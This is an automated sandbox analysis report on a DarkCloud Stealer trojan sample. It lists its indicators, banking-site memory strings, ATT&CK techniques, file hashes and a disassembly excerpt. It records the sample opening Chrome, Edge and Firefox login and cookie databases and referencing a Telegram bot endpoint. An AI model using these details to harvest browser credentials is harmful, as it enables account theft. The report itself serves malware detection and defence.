                Source: WebData.0.drBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: WebData.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: WebData.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: WebData.0.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: WebData.0.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: WebData.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: WebData.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: WebData.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: WebData.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: WebData.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: WebData.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: WebData.0.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: WebData.0.drBinary or memory string: AMC password management pageVMware20,11696497155
                Source: WebData.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: WebData.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: WebData.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: WebData.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: WebData.0.drBinary or memory string: discord.comVMware20,11696497155f
                Source: AGrsqxaSjd.exe, 00000000.00000002.2571164744.000000000068F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ctivebrokers.co.inVMware20,11696497155d
                Source: WebData.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: WebData.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: WebData.0.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: WebData.0.drBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: WebData.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: WebData.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: WebData.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: AGrsqxaSjd.exe, type: SAMPLE
                Source: Yara matchFile source: 0.2.AGrsqxaSjd.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.AGrsqxaSjd.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.1328576742.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: AGrsqxaSjd.exe PID: 7416, type: MEMORYSTR
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\AGrsqxaSjd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                Source: Yara matchFile source: Process Memory Space: AGrsqxaSjd.exe PID: 7416, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: AGrsqxaSjd.exe, type: SAMPLE
                Source: Yara matchFile source: 0.2.AGrsqxaSjd.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.AGrsqxaSjd.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.1328576742.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: AGrsqxaSjd.exe PID: 7416, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Process Injection
                1
                Process Injection
                1
                OS Credential Dumping
                1
                Security Software Discovery
                Remote Services11
                Input Capture
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Obfuscated Files or Information
                11
                Input Capture
                1
                System Network Configuration Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                DLL Side-Loading
                Security Account Manager1
                System Information Discovery
                SMB/Windows Admin Shares1
                Data from Local System
                2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                AGrsqxaSjd.exe84%ReversingLabsWin32.Trojan.DarkCloudStealer
                AGrsqxaSjd.exe100%AviraTR/Dropper.Gen
                AGrsqxaSjd.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://showip.netW0%Avira URL Cloudsafe
                http://showip.netll_0%Avira URL Cloudsafe
                http://showip.neto0%Avira URL Cloudsafe
                http://showip.net/20%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                showip.net
                162.55.60.2
                truefalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://ac.ecosia.org/autocomplete?q=AGrsqxaSjd.exe, 00000000.00000003.1343067039.000000000069B000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://duckduckgo.com/chrome_newtabAGrsqxaSjd.exe, 00000000.00000003.1343067039.000000000069B000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://schema.orgAGrsqxaSjd.exe, 00000000.00000003.1384373852.0000000000734000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384398201.0000000000723000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384339139.0000000003308000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://showip.netWAGrsqxaSjd.exe, 00000000.00000002.2571164744.00000000006A7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://duckduckgo.com/ac/?q=AGrsqxaSjd.exe, 00000000.00000003.1343067039.000000000069B000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1AGrsqxaSjd.exe, 00000000.00000003.1384447891.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000002.2571406087.000000000072B000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384398201.0000000000723000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384421857.000000000070F000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384339139.0000000003308000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000002.2571164744.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384447891.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000002.2571779294.0000000003300000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000002.2571164744.00000000006A7000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoAGrsqxaSjd.exe, 00000000.00000003.1343067039.000000000069B000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://api.telegram.org/botAGrsqxaSjd.exefalse
                                high
                                https://showip.net/AGrsqxaSjd.exe, 00000000.00000003.1384373852.0000000000734000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384398201.0000000000723000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384339139.0000000003308000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchAGrsqxaSjd.exe, 00000000.00000003.1343067039.000000000069B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://www.openstreetmap.org/copyrightAGrsqxaSjd.exe, 00000000.00000003.1384339139.0000000003308000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://showip.net/2AGrsqxaSjd.exe, 00000000.00000003.1384447891.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000002.2571164744.00000000006D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://unpkg.com/leafletAGrsqxaSjd.exe, 00000000.00000003.1384339139.0000000003308000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AGrsqxaSjd.exe, 00000000.00000003.1343067039.000000000069B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://showip.netll_AGrsqxaSjd.exe, 00000000.00000002.2571164744.00000000006A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=AGrsqxaSjd.exe, 00000000.00000003.1343067039.000000000069B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://www.maxmind.comAGrsqxaSjd.exe, 00000000.00000003.1384339139.0000000003308000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://showip.net/?checkip=AGrsqxaSjd.exe, 00000000.00000003.1384373852.0000000000734000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384398201.0000000000723000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000003.1384339139.0000000003308000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://www.ecosia.org/newtab/AGrsqxaSjd.exe, 00000000.00000003.1343067039.000000000069B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=AGrsqxaSjd.exe, 00000000.00000003.1343067039.000000000069B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://showip.net/AGrsqxaSjd.exe, 00000000.00000003.1384447891.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000002.2571164744.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, AGrsqxaSjd.exe, 00000000.00000002.2571164744.00000000006A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://showip.netoAGrsqxaSjd.exe, 00000000.00000002.2571164744.0000000000694000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://showip.netAGrsqxaSjd.exe, 00000000.00000002.2571164744.00000000006A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        162.55.60.2
                                                        showip.netUnited States
                                                        35893ACPCAfalse
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1571529
                                                        Start date and time:2024-12-09 14:30:09 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 4m 20s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:8
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:AGrsqxaSjd.exe
                                                        renamed because original name is a hash value
                                                        Original Sample Name:02409c8e60592f537c66f9faf8137c6ad71bfa81884107f926c4f9a69429144e.exe
                                                        Detection:MAL
                                                        Classification:mal96.troj.spyw.winEXE@2/4@1/1
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 28
                                                        • Number of non-executed functions: 53
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: AGrsqxaSjd.exe
                                                        No simulations
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        162.55.60.2yMvZXcwN2OdoP6x.exeGet hashmaliciousDarkCloudBrowse
                                                        • showip.net/
                                                        oS6KsQIqJxe038Y.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                                        • showip.net/
                                                        Purchase Order AB013058.PDF.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                                        • showip.net/
                                                        MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                        • showip.net/
                                                        wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                        • showip.net/
                                                        8m65n7ieJC.exeGet hashmaliciousDarkCloudBrowse
                                                        • showip.net/
                                                        Factura modificada____678979879.exeGet hashmaliciousDarkCloudBrowse
                                                        • showip.net/
                                                        Pago SEPA.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                        • showip.net/
                                                        Lista de cotizaciones.exeGet hashmaliciousDarkCloudBrowse
                                                        • showip.net/
                                                        New Order___________pdf.exeGet hashmaliciousDarkCloudBrowse
                                                        • showip.net/
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        showip.netyMvZXcwN2OdoP6x.exeGet hashmaliciousDarkCloudBrowse
                                                        • 162.55.60.2
                                                        oS6KsQIqJxe038Y.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                                        • 162.55.60.2
                                                        Purchase Order AB013058.PDF.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                                        • 162.55.60.2
                                                        MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                        • 162.55.60.2
                                                        wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                        • 162.55.60.2
                                                        8m65n7ieJC.exeGet hashmaliciousDarkCloudBrowse
                                                        • 162.55.60.2
                                                        Factura modificada____678979879.exeGet hashmaliciousDarkCloudBrowse
                                                        • 162.55.60.2
                                                        Pago SEPA.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                        • 162.55.60.2
                                                        Lista de cotizaciones.exeGet hashmaliciousDarkCloudBrowse
                                                        • 162.55.60.2
                                                        New Order___________pdf.exeGet hashmaliciousDarkCloudBrowse
                                                        • 162.55.60.2
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        ACPCAOwari.ppc.elfGet hashmaliciousUnknownBrowse
                                                        • 162.1.10.3
                                                        Owari.arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 162.137.25.149
                                                        DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.213.94
                                                        MN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.215.33
                                                        jew.mips.elfGet hashmaliciousUnknownBrowse
                                                        • 162.52.78.93
                                                        home.ppc.elfGet hashmaliciousMiraiBrowse
                                                        • 162.54.91.8
                                                        i686.elfGet hashmaliciousUnknownBrowse
                                                        • 162.54.34.238
                                                        main_mpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 162.65.245.139
                                                        sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                        • 162.55.63.205
                                                        teste.x86_64.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                        • 162.128.62.120
                                                        No context
                                                        No context
                                                        Process:C:\Users\user\Desktop\AGrsqxaSjd.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                        Category:dropped
                                                        Size (bytes):51200
                                                        Entropy (8bit):0.8746135976761988
                                                        Encrypted:false
                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\AGrsqxaSjd.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1221538113908904
                                                        Encrypted:false
                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                        MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                        SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                        SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                        SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\AGrsqxaSjd.exe
                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                        Category:modified
                                                        Size (bytes):98304
                                                        Entropy (8bit):0.08235737944063153
                                                        Encrypted:false
                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\AGrsqxaSjd.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):0.017262956703125623
                                                        Encrypted:false
                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):6.923052379146856
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 98.59%
                                                        • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                        • UPX compressed Win32 Executable (30571/9) 0.30%
                                                        • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        File name:AGrsqxaSjd.exe
                                                        File size:411'648 bytes
                                                        MD5:065753739a03f973e392ff9d2e744d44
                                                        SHA1:404470202a947ced4f89674856b819f1ae183f5c
                                                        SHA256:02409c8e60592f537c66f9faf8137c6ad71bfa81884107f926c4f9a69429144e
                                                        SHA512:0ea8d18f4fb990ba94298465d55d3890f5dad23653507133c8450081cfa5aa519394673657c7c8a3f044a5cbbfb9783022b7e518993e07e5420092181176f32d
                                                        SSDEEP:12288:srL6kXGxltymcfhTYs1yk+KjYKkJj6GmZU:0Xp0s13+sYb6nZ
                                                        TLSH:B3943926E620703EF563C8B1B9E5A257A8252D361694AD1BF391EF0935312E3B4F131F
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}...9...9...9.......8...P...?.......8...Rich9...........PE..L....z.g.............................5............@................
                                                        Icon Hash:00869eb0b230201f
                                                        Entrypoint:0x403594
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:
                                                        Time Stamp:0x670C7A9E [Mon Oct 14 01:57:50 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:5f466a91533ccabcf8e304faad3b90f2
                                                        Instruction
                                                        push 0040395Ch
                                                        call 00007F4C98D9AD73h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        xor byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        inc eax
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add cl, dh
                                                        call far 4881h : F14F403Bh
                                                        lodsd
                                                        and al, dl
                                                        insd
                                                        out D7h, al
                                                        mov esp, 000000DEh
                                                        add byte ptr [eax], al
                                                        add byte ptr [ecx], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax-5Fh], bl
                                                        xor al, byte ptr [ebx]
                                                        push eax
                                                        jc 00007F4C98D9ADF1h
                                                        push 00000065h
                                                        arpl word ptr [ecx+esi+00h], si
                                                        rol dword ptr [eax+00h], 08h
                                                        rol dword ptr [eax+00h], 00000000h
                                                        add byte ptr [eax], al
                                                        add bh, bh
                                                        int3
                                                        xor dword ptr [eax], eax
                                                        add eax, B053A203h
                                                        sbb eax, ebp
                                                        mov eax, dword ptr [eax-60h]
                                                        fmul st(0), st(1)
                                                        pop esi
                                                        or byte ptr [edx], bh
                                                        xor esi, 1505F753h
                                                        sar byte ptr [ebp-5A49B8A6h], cl
                                                        add dword ptr [ebp+4Fh], ebx
                                                        push ss
                                                        xchg eax, edx
                                                        cdq
                                                        cmp cl, byte ptr [edi-53h]
                                                        xor ebx, dword ptr [ecx-48EE309Ah]
                                                        or al, 00h
                                                        stosb
                                                        add byte ptr [eax-2Dh], ah
                                                        xchg eax, ebx
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        loop 00007F4C98D9AD82h
                                                        add byte ptr [eax], al
                                                        inc esi
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add eax, 726F4600h
                                                        insd
                                                        xor dword ptr [eax], eax
                                                        or eax, 46000501h
                                                        outsd
                                                        jc 00007F4C98D9ADEFh
                                                        xor dword ptr [eax], eax
                                                        or al, byte ptr [ecx]
                                                        sbb dword ptr [ecx], eax
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3b7940x28.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3e0000x28f38.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x3c0000x3b600457d0e1d61ddb168cc0f3091b478bb30False0.33246710526315787data5.779114393920952IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .data0x3d0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x3e0000x28f380x28e00298637d500a8d2dbdf56e8fd813b2a45False0.9593248279816514data7.876896783910386IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        CUSTOM0x3e9380x28600PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressedEnglishUnited States0.9682668540687248
                                                        RT_ICON0x3e8080x130Device independent bitmap graphic, 32 x 64 x 1, image size 2560.3223684210526316
